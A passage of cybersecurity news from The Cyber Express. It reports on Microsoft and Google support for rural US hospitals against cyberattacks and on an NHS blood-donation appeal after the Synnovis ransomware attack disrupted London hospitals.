“Cyber-attacks against the U.S. healthcare systems rose 130% in 2023, forcing hospitals to cancel procedures and impacting Americans’ access to critical care. Rural hospitals are particularly hard hit as they are often the sole source of care for the communities they serve and lack trained cyber staff and modern cyber defenses. President Biden is committed to every American having access to the care they need, and effective cybersecurity is a part of that. So, we’re excited to work with Microsoft to launch cybersecurity programs that will provide training, advice and technology to help America’s rural hospitals be safe online.”Alongside Microsoft's efforts, Google also announced that it will provide free cybersecurity advice to rural hospitals and non-profit organizations while also launching a pilot program to match its cybersecurity services with the specific needs of rural healthcare facilities.
Plans Are Part of Broader National Effort
Rural hospitals remain one of the most common targets for cyberattacks, according to data from the National Rural Health Association. Rural hospitals in the U.S. serve over 60 million people living in rural areas, who sometimes have to travel considerable distance for care even without the inconvenience of a cyberattack. Neuberger stated, “We’re in new territory as we see ... this wave of attacks against hospitals.” Rick Pollack, president of the American Hospital Association, said, “Rural hospitals are often the primary source of healthcare in their communities, so keeping them open and safe from cyberattacks is critical. We appreciate Microsoft stepping forward to offer its expertise and resources to help secure part of America’s healthcare safety net.” The plans are a part of a broader effort by the United States government to direct private partners and tech giants such as Microsoft and Google to use their expertise to plug significant gaps in the defense of the healthcare sector. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.- Cybersecurity News and Magazine
- NHS Makes Urgent Request for Blood Donations After Ransomware Attack Interrupts Blood Transfusions
NHS Makes Urgent Request for Blood Donations After Ransomware Attack Interrupts Blood Transfusions
NHS Blood and Transplant's Urgent Appeal for Blood Donations
The recent cyberattack on the pathology firm Synnovis, believed to have been orchestrated by the Russian cybercriminal group Qilin, caused significant disruption to several London hospitals. As a result, affected hospitals have been unable to match patients' blood at the usual rates, leading to the declaration of a critical incident and the cancellation of scheduled blood transfusions. Gail Miflin, chief medical officer at NHS Blood and Transplant, emphasized the importance of O blood-type donations during this critical time. She called on existing O blood donors to book urgent appointments and encouraged potential new donors to find out their blood type and contribute to solving the shortage. During NHS National Blood Week, it was revealed that hospitals require three blood donations every minute. With around 13,000 appointments available nationwide this week, and 3,400 specifically in London, there are many opportunity for donors to come forward and contribute to blood availability. Stephen Powis, the medical director for NHS England, praised the resilience of NHS staff amid the cyberattack and urged eligible donors to come forward to one of the 13,000 available appointments in NHS blood donor centers across the country. To learn more and find details on how to donate, interested individuals are encouraged to search 'GiveBlood' online and on social media or visit Blood.co.uk. [caption id="attachment_76310" align="alignnone" width="2562"] Source: www.blood.co.uk[/caption]Impact of the Cyberattack on London Hospitals
Several prominent London hospitals, including the King's College Hospital, Guy's and St Thomas', the Royal Brompton, and the Evelina London Children's Hospital, declared a critical incident following the cyberattack on the pathology firm Synnovis, which provides blood-testing facilities to these hospitals and several others in southeast London. The attack forced hospital staff to cancel health procedures such as cancer surgeries and transplants due to the unavailability of blood transfusion services after facing severe disruption. In a statement on its official website, an NHS London spokesperson stressed the importance of pathology services to health treatment procedures:“NHS staff are working around the clock to minimise the significant disruption to patient care following the ransomware cyber-attack and we are sorry to all those who have been impacted. Pathology services are integral to a wide range of treatments and we know that a number of operations and appointments have been cancelled due to this attack. We are still working with hospitals and local GP services to fully assess the disruption, and ensure the data is accurate. In the meantime our advice to patients remains, if you have not been contacted please do continue to attend your appointments.”A senior NHS manager disclosed to the Health Service Journal (HSJ) that the incident was “everyone’s worst nightmare.” As blood has a limited shelf life of 35 days, it is critical that these hospital stocks are continually replenished. More units of O-negative and O-positive blood will be required over the coming weeks to accommodate an anticipated increase in surgeries and procedures due to earlier delays. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.